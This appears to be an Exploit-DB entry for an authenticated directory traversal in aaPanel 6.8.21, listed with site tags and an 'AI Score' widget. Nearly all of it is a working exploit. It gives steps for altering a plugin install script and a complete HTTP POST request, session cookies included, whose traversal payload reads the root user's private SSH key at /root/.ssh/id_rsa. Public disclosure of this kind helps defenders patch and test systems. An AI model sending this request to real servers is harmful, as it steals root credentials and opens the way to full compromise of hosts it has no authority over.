aaPanel 6.8.21 - Directory Traversal (Authenticated)

2022-02-2300:00:00

Ghuliev

www.exploit-db.com

265

directory traversal

authenticated

application vulnerability

root user

private ssh key

exploit title

vendor homepage

software link

version

tested on

ubuntu

exploit author

ajax action

host ip

content length

accept header

user agent

content type

origin

referer

connection close

AI Score

7.4

Confidence

Low

JSON

# Exploit Title: aaPanel 6.8.21 - Directory Traversal (Authenticated)
# Date: 22.02.2022
# Exploit Author: Fikrat Ghuliev (Ghuliev)
# Vendor Homepage: https://www.aapanel.com/
# Software Link: https://www.aapanel.com
# Version: 6.8.21
# Tested on: Ubuntu

Application vulnerable to Directory Traversal and attacker can get root user private ssh key(id_rsa)

#Go to App Store

#Click to "install" in any free plugin.

#Change installation script to ../../../root/.ssh/id_rsa

POST /ajax?action=get_lines HTTP/1.1
Host: IP:7800
Content-Length: 41
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82
Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://IP:7800
Referer: http://IP:7800/soft
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: aa0775f98350c5c13bfd21f2c6b8c288=d20c4937-e5ae-46fb-b8bd-fa7c290d805a.ohyRHdOIMj3DBfyddCRbL-rlKB0;
request_token=nKLXa4RUXgwBHeWNyMH1MEDSkTaks9dWjQ7zzA0iRc7lrHwd;
serverType=nginx; order=id%20desc; memSize=3889; vcodesum=13;
page_number=20; backup_path=/www/backup; sites_path=/www/wwwroot;
distribution=ubuntu; serial_no=; pro_end=-1; load_page=null;
load_type=null; load_search=undefined; force=0; rank=list;
Path=/www/wwwroot; bt_user_info=; default_dir_path=/www/wwwroot/;
path_dir_change=/www/wwwroot/
Connection: close

num=10&filename=../../../root/.ssh/id_rsa

AI Score

7.4

Confidence

Low

JSON